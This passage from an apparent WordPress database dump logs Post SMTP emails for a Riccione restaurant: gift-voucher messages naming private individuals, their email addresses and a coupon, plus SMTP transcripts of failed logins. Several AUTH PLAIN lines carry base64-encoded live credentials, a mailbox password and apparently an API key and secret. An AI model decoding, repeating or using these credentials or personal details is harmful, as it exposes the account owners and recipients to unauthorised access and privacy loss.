5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656083www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(21881,1145,'original_headers','[\"Bcc:marcello.manduchi@hotmail.it\"]'),(21882,1145,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 25 Oct 2020 16:01:26 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n535 Incorrect authentication data\r\n'),(21883,1146,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21884,1146,'success',''),(21885,1146,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21886,1146,'to_header','marcello.manduchi@hotmail.it'),(21887,1146,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21888,1146,'original_to','marcello.manduchi@hotmail.it'),(21889,1146,'original_subject','Un buono regale per te - Sol Y Mar'),(21890,1146,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n'),(21891,1146,'original_headers','Content-Type: text/html\r\n'),(21892,1146,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 25 Oct 2020 16:01:32 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n535 Incorrect authentication data\r\n'),(21893,1141,'mwb_wgm_order_giftcard','send'),(21894,1147,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21895,1147,'success',''),(21896,1147,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21897,1147,'to_header','Filos4@libero.it'),(21898,1147,'bcc_header','marcello.manduchi@hotmail.it'),(21899,1147,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21900,1147,'original_to','Filos4@libero.it'),(21901,1147,'original_subject','Sol Y Mar, ristorante a Riccione'),(21902,1147,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656130www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(21903,1147,'original_headers','[\"Bcc:marcello.manduchi@hotmail.it\"]'),(21904,1147,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 25 Oct 2020 16:02:13 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n535 Incorrect authentication data\r\n'),(21905,1148,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21906,1148,'success',''),(21907,1148,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21908,1148,'to_header','marcello.manduchi@hotmail.it'),(21909,1148,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21910,1148,'original_to','marcello.manduchi@hotmail.it'),(21911,1148,'original_subject','Un buono regale per te - Sol Y Mar'),(21912,1148,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n'),(21913,1148,'original_headers','Content-Type: text/html\r\n'),(21914,1148,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 25 Oct 2020 16:02:15 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n535 Incorrect authentication data\r\n'),(21915,1149,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21916,1149,'success',''),(21917,1149,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21918,1149,'to_header','webmaster@baldisserri.com'),(21919,1149,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21920,1149,'original_to','webmaster@baldisserri.com'),(21921,1149,'original_subject','Postman SMTP Test (www.ristorantesolymar.it)'),(21922,1149,'original_message','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>'),(21923,1149,'original_headers','Content-Type: multipart/alternative;'),(21924,1149,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 03:32:30 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(21925,1150,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21926,1150,'success',''),(21927,1150,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21928,1150,'to_header','webmaster@baldisserri.com'),(21929,1150,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:587'),(21930,1150,'original_to','webmaster@baldisserri.com'),(21931,1150,'original_subject','Postman SMTP Test (www.ristorantesolymar.it)'),(21932,1150,'original_message','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>'),(21933,1150,'original_headers','Content-Type: multipart/alternative;'),(21934,1150,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:587\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 03:33:21 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(21935,1151,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21936,1151,'success',''),(21937,1151,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21938,1151,'to_header','webmaster@baldisserri.com'),(21939,1151,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21940,1151,'original_to','webmaster@baldisserri.com'),(21941,1151,'original_subject','Postman SMTP Test (www.ristorantesolymar.it)'),(21942,1151,'original_message','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span 